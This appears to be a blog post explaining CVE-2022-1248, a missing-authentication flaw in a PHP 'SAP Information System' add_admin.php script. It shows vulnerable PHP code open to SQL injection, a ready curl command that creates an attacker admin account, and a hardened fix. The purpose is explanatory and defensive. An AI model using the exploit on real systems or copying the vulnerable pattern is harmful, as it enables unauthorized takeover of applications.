SAP Information System is a tool used in many organizations to manage business data and internal operations. In 2022, a critical vulnerability (CVE-2022-1248) was discovered in SAP Information System version 1., and the implications were severe: anyone on the internet, without needing a password, could become an admin with a simple web request.
In this post, I’ll break down exactly what went wrong in the code, how the exploit works, and link to the official resources. All technical details are simplified so you don’t need to be a security expert to follow.
What Is CVE-2022-1248?
CVE-2022-1248 is a critical vulnerability in /SAP_Information_System/controllers/add_admin.php. According to the official NVD entry, it allows anyone on the internet (no login required!) to send a special web request that creates a new administrator account on the system.
> Impact: Total compromise. Attackers can make themselves admin and control the entire application.
Where’s the Problem? (Root Cause in Code)
The problem is in the add_admin.php file. This script should only allow logged-in (current) admins to add new admin accounts. But due to missing authentication and validation checks, anyone can access the file directly and add an admin.
Here's a simplified version of what the vulnerable code could look like:
```php
<?php
// Vulnerable add_admin.php (simplified)
// No authentication check!
// No session validation!
// $connection is assumed to be an open mysqli handle set up elsewhere.
$username = $_POST['username'];
$password = password_hash($_POST['password'], PASSWORD_DEFAULT);
$email = $_POST['email'];
// Add the new admin to the database.
// Note: the values are also interpolated straight into the SQL string,
// so this query is open to SQL injection on top of the missing auth check.
$sql = "INSERT INTO admins (username, password, email) VALUES ('$username', '$password', '$email')";
mysqli_query($connection, $sql);
echo "Admin added successfully.";
```
How the Exploit Works
Because the file is not protected, you can just send a POST request directly to it and create a new administrator account.
Here's a real exploit example using cURL (run from your terminal):
```shell
curl -X POST http://target.com/SAP_Information_System/controllers/add_admin.php \
  -d 'username=eviladmin&password=p@sswrd123&email=evil@example.com'
```
What happens?
- Even though you aren't logged in, the server adds a new administrator called eviladmin with the password you chose.
- You can now log in as an administrator and do anything you want.
Proof:
If you navigate to the admin login page and use the credentials you just set, you should have full admin access — no hacking skills required.
- Backdoors: You could add malicious code, new users, or even delete everyone else.
- Complete Control: Admin rights give you everything: change settings, take down the site, or remove logs.
Patch and Solution
If you run SAP Information System, update immediately!
- The vendor released a patch that places a proper authentication check before account creation. Patch your system if you haven't.
- Block public access to /controllers/add_admin.php if not patched.
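To make the fix concrete, here is what a hardened version of the controller could look like. This is an added illustration written for this post, not the vendor's actual patch; it assumes the login code stores user_id, role and a csrf_token in the session, and that $connection is an open mysqli handle created elsewhere.

```php
<?php
// Hardened add_admin.php (illustrative, not the vendor's patch).
// Assumed: $_SESSION['user_id'], ['role'] and ['csrf_token'] are set at login,
// and $connection is an open mysqli handle provided by an included config file.
declare(strict_types=1);
session_start();

// 1. Authentication + authorization: only a logged-in admin may continue.
//    This single check is what the vulnerable script was missing.
if (empty($_SESSION['user_id']) || ($_SESSION['role'] ?? '') !== 'admin') {
    http_response_code(403);
    exit('Forbidden');
}

// 2. Accept only POST, and require a per-session CSRF token so a logged-in
//    admin cannot be tricked by a third-party page into submitting this form.
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !hash_equals($_SESSION['csrf_token'] ?? '', (string) ($_POST['csrf_token'] ?? ''))) {
    http_response_code(400);
    exit('Bad request');
}

// 3. Validate input before it goes anywhere near the database.
$username = trim((string) ($_POST['username'] ?? ''));
$email    = filter_var($_POST['email'] ?? '', FILTER_VALIDATE_EMAIL);
$password = (string) ($_POST['password'] ?? '');
if (!preg_match('/^[A-Za-z0-9_.-]{3,32}$/', $username) || $email === false || strlen($password) < 12) {
    http_response_code(422);
    exit('Invalid input');
}

// 4. Prepared statement: user input is bound as data, never spliced into SQL.
$stmt = mysqli_prepare($connection, 'INSERT INTO admins (username, password, email) VALUES (?, ?, ?)');
if ($stmt === false) {
    http_response_code(500);
    exit('Database error');
}
$hash = password_hash($password, PASSWORD_DEFAULT);
mysqli_stmt_bind_param($stmt, 'sss', $username, $hash, $email);
mysqli_stmt_execute($stmt);

// 5. Audit trail: record who created the account and from where.
error_log(sprintf('admin account "%s" created by user %d from %s',
    $username, (int) $_SESSION['user_id'], $_SERVER['REMOTE_ADDR'] ?? 'unknown'));
echo 'Admin added successfully.';
```

Step 1 alone closes the hole described in this post; steps 2 to 5 address the secondary weaknesses visible in the simplified vulnerable code (no CSRF protection, string-built SQL, no audit record).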
Official References
- NVD Record: https://nvd.nist.gov/vuln/detail/CVE-2022-1248
- Full Disclosure: Exploit Database
- Vendor Advisory: SAP Security Notes
Conclusion
CVE-2022-1248 is a textbook example of why you should never trust direct access to sensitive scripts. A simple lack of authentication can lead to disaster, handing attackers the keys to the kingdom with a single web request.
If you run SAP Information System, check your version and patch right away.
Timeline
Published on: 04/06/2022 03:15:00 UTC
Last modified on: 04/13/2022 15:13:00 UTC